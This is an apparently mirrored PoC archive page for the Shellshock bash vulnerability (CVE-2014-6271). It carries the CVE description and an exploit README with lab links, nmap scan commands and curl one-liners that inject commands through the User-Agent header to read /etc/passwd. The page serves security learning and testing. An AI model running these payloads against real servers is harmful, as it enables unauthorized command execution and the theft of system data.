Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
Associated Vulnerability
Title: GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
Exploitation of "Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi
Readme
<div aling="center">

  <img src="https://github.com/Jsmoreira02/CVE-2014-6271/assets/103542430/ee3f79ee-67c6-4b72-ae82-263a5d5d5ffc">
    
  <img src="https://img.shields.io/badge/Language%20-Python3-blue.svg" style="max-width: 100%;">
  <img src="https://img.shields.io/badge/CVE%20-Shellshock-cyan.svg" style="max-width: 100%;">
  <img src="https://img.shields.io/badge/Target OS%20-Linux-yellow.svg" style="max-width: 100%;">
  <img src="https://img.shields.io/badge/Exploit%20-teste?style=flat-square" style="max-width: 100%;">  
  <img src="https://img.shields.io/badge/Type%20-Script-red.svg" style="max-width: 100%;">
</div>


# Shellshock Exploitation (CVE-2014-6271)

Shellshock is effectively a Remote Command Execution vulnerability in BASH. This script exploits the vulnerability in the web environment on apache or similar with mod_cgi enabled. The vulnerability lies in the manipulation of environment variables, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching malicious code to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system.


### Lab for vulnerability testing

- [PentesterLab](https://www.vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/)
- [VulnHub](https://www.vulnhub.com/entry/sumo-1,480/)
- [TryHackMe](https://tryhackme.com/room/0day)

  ![Vídeo2](https://github.com/Jsmoreira02/CVE-2014-6271/assets/103542430/b9da536f-2cbe-4c47-9ea1-bfbc07f610f2)

#


#### Find CGI-BIN pages:
```bash
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
```

#### Manual test:
```bash
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
```



# Warning:    
> I am not responsible for any illegal use or damage caused by this tool. It was written for fun, not evil and is intended to raise awareness about hacking and cybersecurity


***Good Hacking :)***
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →